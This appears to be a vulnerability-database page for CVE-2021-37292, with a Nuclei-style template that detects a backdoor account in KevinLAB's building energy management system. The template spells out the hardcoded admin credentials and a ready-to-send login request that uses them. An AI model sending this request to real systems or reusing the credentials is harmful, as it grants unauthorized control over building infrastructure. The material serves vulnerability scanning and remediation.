| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2021-37292 | 11 Apr 202219:15 | – | attackerkb | |
| CVE-2021-37292 | 11 Apr 202222:16 | – | circl | |
| KevinLAB Building Energy Management System 安全漏洞 | 11 Apr 202200:00 | – | cnnvd | |
| KevinLAB Building Energy Management System Access Control Error Vulnerability | 13 Apr 202200:00 | – | cnvd | |
| CVE-2021-37292 | 11 Apr 202218:13 | – | cve | |
| CVE-2021-37292 | 11 Apr 202218:13 | – | cvelist | |
| EUVD-2021-23864 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-37292 | 11 Apr 202219:15 | – | nvd | |
| CVE-2021-37292 | 11 Apr 202219:15 | – | osv | |
| Improper access control | 11 Apr 202219:15 | – | prion |
id: CVE-2021-37292
info:
name: KevinLAB BEMS (Building Energy Management System) - Backdoor Account
author: gy741
severity: high
description: |
KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
impact: |
Attackers using hardcoded backdoor credentials (kevinlab/kevin003) can gain full administrative access with highest privileges to KevinLAB BEMS, bypassing all authentication mechanisms.
remediation: |
Remove the hardcoded backdoor account or upgrade to a patched version of KevinLAB BEMS.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
- https://nvd.nist.gov/vuln/detail/cve-2021-37292
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2021-37292
epss-score: 0.06719
epss-percentile: 0.93144
cwe-id: NVD-CWE-Other
cpe: cpe:2.3:a:kevinlab:4st_l-bems:1.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kevinlab
product: 4st_l-bems
tags: cve,cve2021,kevinlab,bems,backdoor,vuln
http:
- raw:
- |
POST /http/index.php HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'data":"[A-Za-z0-9-]+'
- 'login_key":"[A-Za-z0-9-]+'
condition: or
- type: word
part: body
words:
- '"result":true'
- type: status
status:
- 200
# digest: 4a0a00473045022100e369d91660b9dfa4407e289c25985906b7fc66ee64677b0b16c7bdcb48bf5b7c02202a9766d4a164e26afdb4ebf9e730c14b887ea6d5c58e23ca525fbf9ac706b5ca:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation